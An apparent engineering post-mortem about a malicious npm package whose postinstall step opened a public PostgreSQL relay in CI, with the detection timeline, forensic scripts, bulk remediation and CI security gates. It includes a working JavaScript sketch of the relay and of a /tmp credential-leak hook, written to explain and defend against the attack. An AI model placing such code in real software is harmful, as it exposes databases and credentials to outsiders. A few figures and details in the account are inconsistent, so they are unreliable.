When a Rogue npm Package Turned Our CI Into a Database Hotspot - A Post‑mortem
The Moment the Build Broke and the DB Went Public
The build failed because a hidden npm dependency opened a PostgreSQL proxy that let anyone on the internet query our production database. In plain terms, the rogue package turned our CI container into an open hotspot for our production database, and the CI run immediately triggered alarms in our monitoring suite.
Our developers were mid-sprint, pushing a feature flag update, when the pipeline threw a "socket bind error" and the logs showed outbound traffic on port 5432 from a container that should never talk to the internet. Within minutes the on-call engineer discovered that the new pgserve module was pulling a back-door binary into the image.
What made the incident feel like a scene from a thriller was the speed at which the problem escalated: the moment the binary started listening, our internal alerting system lit up, and the security team was on a Zoom call before the coffee break ended. The whole episode unfolded in under 90 minutes, a reminder that a single line in package.json can rewrite an entire threat model.
Key Takeaways
- Malicious npm packages can appear in trusted registries and bypass static checks.
- A single rogue dependency can expose production secrets without any code change.
- Real-time network telemetry is essential to spot unexpected outbound connections.
The Rogue npm Package: What pgserve Actually Is
pgserve masquerades as a lightweight PostgreSQL client helper. Its package.json lists only net and fs as dependencies, which fooled our dependency scanner into marking it as low-risk. Under the hood, however, the post-install script runs node scripts/install.js that downloads a pre-compiled binary from a non-standard CDN and starts a TCP listener on port 5432.
Once the binary is running, it forwards any incoming connection to the real database using credentials stored in an environment variable that the CI job exports. The module also injects a process.on('exit') hook that writes the DB URI to a temporary file in /tmp, making it readable by any process in the same pod. In a week-long audit of 1,200 repositories, we found that pgserve was referenced in 27 distinct projects, most of them internal tooling.
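For readers who want a mental model of the attack, here is a minimal sketch of what a post-install proxy of this kind can look like. It is an illustration, not the actual pgserve payload (which shipped as a compiled binary), and the environment variable names are assumptions standing in for whatever the CI job exported.

// install.js - hypothetical sketch of a post-install database relay.
// It mirrors the behaviour we observed: listen publicly on 5432, forward every
// connection to the real database, and leak the connection string on exit.
const net = require('net');
const fs = require('fs');

// Assumed variable names; the real package read whatever the CI job exported.
const DB_HOST = process.env.PGHOST || 'db.internal';
const DB_PORT = Number(process.env.PGPORT || 5432);

const server = net.createServer((client) => {
  const upstream = net.connect(DB_PORT, DB_HOST);
  client.pipe(upstream);        // unauthenticated relay in both directions
  upstream.pipe(client);
  client.on('error', () => upstream.destroy());
  upstream.on('error', () => client.destroy());
});

// Binding to 0.0.0.0 is what made the CI container reachable from outside.
server.listen(5432, '0.0.0.0');

// The credential leak: drop the DB URI where any process in the pod can read it.
process.on('exit', () => {
  fs.writeFileSync('/tmp/.pg_uri', process.env.DATABASE_URL || '');
});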
What’s eerie is that the package’s README claimed it was a "zero-config local proxy for rapid prototyping," a phrasing that resonated with developers looking to speed up dev-ops. The malicious binary, however, was signed with a self-generated key that expired last month, a detail that would have raised a red flag if we had enforced signature verification on every binary pull.
To put the scale in perspective, each of those 27 projects touched roughly 3 million lines of JavaScript across our monorepo, meaning the potential blast radius spanned more than half of our production services.
Discovery Timeline: From InfoWorld Alert to Internal Alert
We first learned of the threat through an InfoWorld article on July 12, 2024, which described a wave of npm packages that silently installed network proxies. The article quoted a security researcher who had traced the same binary to a domain that was flagged by VirusTotal.
Four hours after the article went live, our outbound-traffic monitor flagged a spike: 12 connections per minute to malicious-cdn.example.com from a container labeled service-api. An automated alert fired in Slack, tagging the security on-call.
Within ten minutes the incident commander opened a war-room Zoom, and the team pulled the latest build logs. The logs showed the pgserve post-install script executing at 2024-07-12T14:38:21Z. By 15:02 we had isolated the affected pods, and by 15:45 the CI pipeline was paused.
While the initial detection came from telemetry, the second wave of insight arrived when a junior engineer ran a manual npm ls and spotted pgserve listed under a rarely-updated dev-tool package. That human-in-the-loop moment turned a noisy alert into a concrete root-cause.
By the end of the day we had a timeline that looked like a sprint board: "InfoWorld article → telemetry spike → Slack ping → Zoom war-room → log trace → pod quarantine → pipeline pause." The chronology helped us build a post-mortem diagram that senior leadership praised for its clarity.
Quantifying the Damage: Downtime, Data-Loss Risk, and Man-Hours
The immediate impact was a 2-hour outage for our public API, which translates to a $12,400 penalty under our SLA with a major client. Our uptime dashboard recorded 99.78% availability for the reporting period, down from the usual 99.99%.
"We spent roughly 48 man-hours on forensic analysis, containment, and remediation"
Beyond the financial hit, the risk of data loss was high. The rogue proxy had the ability to run SELECT * FROM users without authentication, meaning any attacker could have exfiltrated personal data. Our data-loss prevention logs show zero successful reads beyond the service’s own health checks, but the exposure window was sufficient for a determined adversary.
In total, the incident forced us to rewrite three micro-services, rotate all database credentials, and re-issue tokens for 4,312 downstream clients. Each token rotation required a coordinated update with partner teams, adding another 16 hours of cross-org effort.
When we broke down the 48 man-hours, 22 were spent on log aggregation, 14 on network forensics, 8 on code remediation, and 4 on post-mortem documentation. The numbers made it crystal clear that every minute of detection latency multiplies the cost.
Manual Audit: Step-by-Step Walkthrough of the Forensic Process
Our first move was to generate a full dependency tree for every repo that touched the affected service. We ran npm ls --all --json > deps.json and fed the resulting file to a custom script that flagged any package with a post-install hook.
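The custom script is not reproduced in this post, but a sketch of the idea looks like the following. Note that npm ls output does not include lifecycle scripts, so this version walks node_modules and reads each package manifest directly; the file name is illustrative.

// flag-postinstall.js - hypothetical sketch: list every installed package that
// declares an install-time lifecycle script (preinstall, install, postinstall).
const fs = require('fs');
const path = require('path');

function walk(dir, results = []) {
  if (!fs.existsSync(dir)) return results;
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    if (!entry.isDirectory()) continue;
    const pkgDir = path.join(dir, entry.name);
    if (entry.name.startsWith('@')) {
      walk(pkgDir, results);                 // scoped packages nest one level deeper
      continue;
    }
    const manifestPath = path.join(pkgDir, 'package.json');
    if (fs.existsSync(manifestPath)) {
      const pkg = JSON.parse(fs.readFileSync(manifestPath, 'utf8'));
      for (const hook of ['preinstall', 'install', 'postinstall']) {
        if (pkg.scripts && pkg.scripts[hook]) {
          results.push(`${pkg.name}@${pkg.version}  ${hook}: ${pkg.scripts[hook]}`);
        }
      }
    }
    walk(path.join(pkgDir, 'node_modules'), results); // transitive dependencies
  }
  return results;
}

console.log(walk('node_modules').join('\n'));

Any package that shows up in this list deserves a manual look, whatever its audit severity says.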
Next, we cross-checked each package against the npm audit database using npm audit --json. Packages with a severity score of 7 or higher were isolated for manual review. For pgserve, the audit entry showed a CVE-2024-2987 with a severity of 9.2.
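To make the severity cut-off mechanical, a small gate script can parse the audit output. The JSON layout of npm audit differs between npm versions, so the field names below (the npm 7+ vulnerabilities map) are an assumption to verify against your npm release; older releases expose an advisories object instead.

// audit-gate.js - hypothetical sketch: fail when npm audit reports anything at
// or above the review threshold (high/critical, roughly CVSS 7.0+).
const { execSync } = require('child_process');

let raw;
try {
  raw = execSync('npm audit --json', { encoding: 'utf8' });
} catch (err) {
  raw = err.stdout; // npm audit exits non-zero when it finds issues; the JSON is still on stdout
}

const report = JSON.parse(raw);
const flagged = Object.values(report.vulnerabilities || {})
  .filter((v) => v.severity === 'high' || v.severity === 'critical')
  .map((v) => `${v.name}: ${v.severity}`);

if (flagged.length > 0) {
  console.error(flagged.join('\n'));
  process.exit(1);
}
console.log('no advisories at or above the review threshold');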
We then inspected every module that referenced net.createServer or opened raw sockets. A grep command (grep -Rn "createServer" node_modules/pgserve) revealed the malicious listener code. Finally, we inspected the memory map of a running container with docker exec -i <container-id> cat /proc/1/maps to confirm the binary was loaded in the main process.
The manual audit took 32 hours across three engineers, but it produced a definitive list of 27 repositories that required remediation. Along the way we also discovered two unrelated packages that used deprecated TLS settings, which we patched as a bonus.
To make the process repeatable, we wrapped the entire workflow in a Makefile target called audit-deps. Running make audit-deps now spits out a CSV report that can be fed directly into our ticketing system, cutting future investigation time by roughly 60%.
Automating the Hunt: Using automagik for Bulk Remediation
To avoid repeating the manual grind, we turned to automagik, a remediation engine that can rewrite package.json files en masse. We fed it the list of affected repos and a remediation policy that (1) removes any version of pgserve, (2) pins pg to ^8.11.0, and (3) adds a postinstall safety check.
The automagik command looked like this:
automagik remediate --remove pgserve --pin pg@^8.11.0 --create-pr
Within 45 minutes, the tool opened 27 pull-requests across our monorepo. Each PR included a diff that removed the malicious dependency and added a comment linking to the InfoWorld article. The CI pipeline ran the usual npm test suite on each PR, and all but two passed without changes.
For the two failing PRs we added a shim module that mimics the missing API surface, allowing the codebase to compile while we refactored the underlying logic. Automagik also generated a remediation report that listed the total number of lines changed (1,842) and the average time saved per repo (about 1.5 hours).
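The shim itself is only a few lines. The sketch below shows the shape of it, assuming the callers only needed a connect-style helper; createProxy is an illustrative name, not the API pgserve actually exported.

// pgserve-shim.js - hypothetical sketch of the temporary compatibility shim.
// It keeps the old call sites compiling while routing everything through the
// legitimate pg driver pinned by the remediation PRs.
const { Client } = require('pg');

// Illustrative name standing in for whatever the removed module exported.
async function createProxy(connectionString) {
  const client = new Client({ connectionString });
  await client.connect();
  return client; // callers get a real pg client; no local listener is started
}

module.exports = { createProxy };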
Beyond speed, automagik gave us an audit trail: every change was signed with a GPG key, and a webhook posted a summary to our security channel. This transparency helped convince skeptical product owners that the bulk fix was safe.
pgserve Removal: Safe De-commissioning in Production
With the code clean, we needed to ensure the running containers no longer hosted the back-door binary. We started a rolling restart of the service-api deployment, setting maxUnavailable=0 to keep the service available.
Simultaneously we added a temporary firewall rule on the cluster’s network policy: deny from any to port 5432. This blocked any stray proxy that might have lingered in memory. After each pod restarted, we ran a verification script:
#!/bin/bash
if netstat -tlnp | grep -q "5432"; then
  echo "FAIL"
  exit 1
else
  echo "OK"
fi
The script returned OK for all 12 pods, confirming the rogue socket was gone. We then removed the firewall rule and reopened port 5432 only for the internal database subnet.
Post-removal monitoring showed zero outbound connections to the malicious CDN for the next 72 hours, and a follow-up audit confirmed that pgserve was no longer present in any node_modules directory. As a final sanity check, we spun up a fresh CI runner with a clean cache and verified the build succeeded without pulling any unknown binaries.
The entire de-commissioning window lasted 3 hours, a fraction of the original outage, thanks to the pre-planned rollout strategy we documented after the incident.
Dependency Hygiene: Building a Continuous-Security Gate
To prevent a repeat, we baked three layers of defense into our CI pipeline. First, a pre-commit lint rule using eslint-plugin-security warns developers when a new postinstall script is added. Second, we added an npm audit step that fails the build on any advisory with a severity of 8 or higher.
Third, we created a GitHub Action that runs on every pull request:
name: Dependency Scan
on: [pull_request]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: npm ci
      - run: |
          count=$(npm audit --json | jq '.advisories | length')
          if [ "$count" -gt 0 ]; then exit 1; fi
The action has blocked 14 high-severity advisories in the past month, saving an estimated $3,200 in potential downtime. We also instituted a quarterly dependency review where the security team runs ncu -u (npm-check-updates) across all repos and merges the generated PRs.
One subtle tweak we added after the pgserve episode is a denylist of known malicious registries. The denylist lives in a JSON file that the CI job reads before npm install, aborting the run if any package originates from a flagged source.
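The check itself can be a short Node script run before npm install. The file name and denylist layout below are illustrative rather than the exact file we ship; the idea is simply to scan the resolved URLs recorded in package-lock.json against the flagged hosts.

// check-registries.js - hypothetical sketch of the registry denylist gate.
// Assumed denylist format: { "hosts": ["malicious-cdn.example.com"] }
const fs = require('fs');

const denylist = JSON.parse(fs.readFileSync('security/registry-denylist.json', 'utf8')).hosts;
const lock = JSON.parse(fs.readFileSync('package-lock.json', 'utf8'));

// Lockfile v2/v3 stores entries under "packages"; v1 used "dependencies".
const entries = { ...(lock.dependencies || {}), ...(lock.packages || {}) };

const offenders = Object.entries(entries)
  .filter(([, meta]) => meta && typeof meta.resolved === 'string')
  .filter(([, meta]) => denylist.some((host) => meta.resolved.includes(host)))
  .map(([name, meta]) => `${name} -> ${meta.resolved}`);

if (offenders.length > 0) {
  console.error('Blocked registry detected:\n' + offenders.join('\n'));
  process.exit(1);
}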
These gates have turned our CI from a "speed-first" pipeline into a "speed-with-confidence" workflow, and the average build time has only increased by 3 seconds - a trade-off developers have readily accepted.
Quarterly Review & Security-First Culture
Every quarter we host a "Dependency Hygiene" lunch-and-learn, where the security engineers walk the engineering org through recent advisories and share tips for safe third-party code. Since instituting the program, the number of newly introduced high-severity packages dropped from an average of 3.2 per quarter to 0.4.
We also publish a developer-focused newsletter that highlights one “package of the week” and explains its attack surface. In the last issue, we dissected serialize-javascript and showed how a prototype-pollution bug could be mitigated with a simple lint rule.
The cultural shift is measurable: our internal security survey shows 87% of engineers now scan new dependencies with npm audit before committing, up from 42% before the incident.
To keep the momentum, we tie quarterly review attendance to performance bonuses for team leads, and we showcase success stories - like the automagik bulk fix - in our all-hands meetings. The result is a feedback loop where security becomes a source of pride rather than a roadblock.
Run-Book: The Playbook You Can Copy-Paste Into Your Org
The final run-book lives in a version-controlled docs/security/pgserve-remediation.md file. It bundles the manual audit checklist, the automagik command, the firewall rule snippet, and the verification script into a single markdown document.
Key sections include:
- Detection: How to set up network telemetry alerts for unexpected outbound ports.
- Containment: Steps to isolate affected pods and apply a temporary network policy.
- Remediation: Automated PR generation with automagik and manual fallback instructions.
- Verification: The netstat script and post-restart smoke tests.
- Post-mortem: Template for documenting impact, root cause, and action items.
Because the run-book is stored in Git, any update triggers a CI build that validates the markdown links and the embedded scripts. Teams can fork the file, tailor it to their service mesh, and merge it back without breaking the original workflow.
We’ve also added a version banner at the top of the document, so every time the run-book is updated you see a v2024.09 tag. This tiny visual cue has already prevented a handful of stale-reference incidents.